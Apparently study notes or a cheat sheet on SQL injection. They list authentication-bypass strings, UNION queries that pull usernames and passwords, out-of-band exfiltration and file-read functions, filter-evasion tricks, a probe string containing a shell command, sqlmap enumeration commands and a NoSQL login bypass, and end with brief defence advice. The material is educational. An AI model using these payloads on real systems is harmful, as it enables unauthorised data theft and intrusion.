SQLi - SQL Injection
Inserting arbitrary information that breaks the handling code in the server
SQLi (SQL Injection)
ie x' or '1'='1
SELECT * FROM users WHERE password = '
x' or '1'='1
Do not DOS!
Limit the amount of data you fetch, as you may accidentally perform a Denial of Service.
- Add your own string escapes to your string to break the code
- Add comments (
) after the string escape to disable other parts of the SQL query
`SELECT * FROM users WHERE username LIKE 'admi%';
SELECT TOP 10 * FROM Articles WHERE Content LIKE '%_[^!_%/%a?F%_D)_(F%)_%([)({}%){()}£$&N%_)$*£()$*R"_)][%](%[x])%a][$*"£$-9]_%'
OOB - Out of Band Injection
When the attacker is unable to use the same channel to both launch and gather results
Sometimes we may have to perform a blind injection, and will be unable to gather verbose results.
(Or there maybe an outbound Web Application Firewall).
OOB injection relies on the dbms making a DNS/HTTP request to deliver data to an attacker
i.e. MySQL
select @@secure_file_priv
NULL -> Disabled
'/directory' -> Restricted import
Default of "" on MySQL < 5.5.53
SELECT * INTO outfile '//'
OS-Interative Databases
If the database access files for ETL (extract, transform, load) operations, there may be vulnerabilities which allow us to read and write into the OS
LOAD DATA INFILE 'data.txt' INTO TABLE db2.my_table;
SELECT LOAD_FILE('/tmp/world') AS world;
It may even be possible to execute shell commands
Make a query inside of a query
Select * from users where isAdmin = (select isAdmin from permissions);
Select user,password from users where username='injectionpoint' union select (select permissions from users limit 1), 'asdf';
Union by Copypaste
SQL Functions
- CHR()
- CAST()
These may help you to bypass WAFs/Filters, extract more content, bypass type constraints.
i.e. if 'admin' is blacklisted -> CONCAT(chr(0x61), chr(0x64), ...)
i.e exfil information -> SELECT CONCAT(username,"|",password)
FROM users`
i.e to bypass type constraints -> CAST(id as VARCHAR)
Which DBMS are we using?
i.e. @@Version, Version(), sqlite_version()
For boolean based injections, we could use substr(version(), 1, 1)=5
to check if the server version is 5.xx
Probing for Vulnerabilities
To find possible vulnerabilities, we want to find error/verbose messages that respond to our input.
This allows us to figure out what attack vectors we can try.
A 'magic string' is a piece of text which contains several possible attack-vectors to probe if a server is vulnerable to SQLi
| '";<lol/>../--#`ls` |
is a tool to automatically perform SQL queries - to fuzz for injection vulnerabilities.
It attempts to identify the database type, and then performs database-specific vectors
./sqlmap -r file.txt --dbms=mySQL
./sqlmap -r file.txt --dbs
- Get databases./sqlmap -r file.txt --dbs --tables
- Get databases and tables
db.users.find({username: username, password: password})
db.users.find({username: username, 'password': {'$gt': ""}})
Defending against SQLi
- Parameterised Queries - Don't just perform a simple concatenation or string replacement
- Don't just trust the people who wrote parameterised query libraries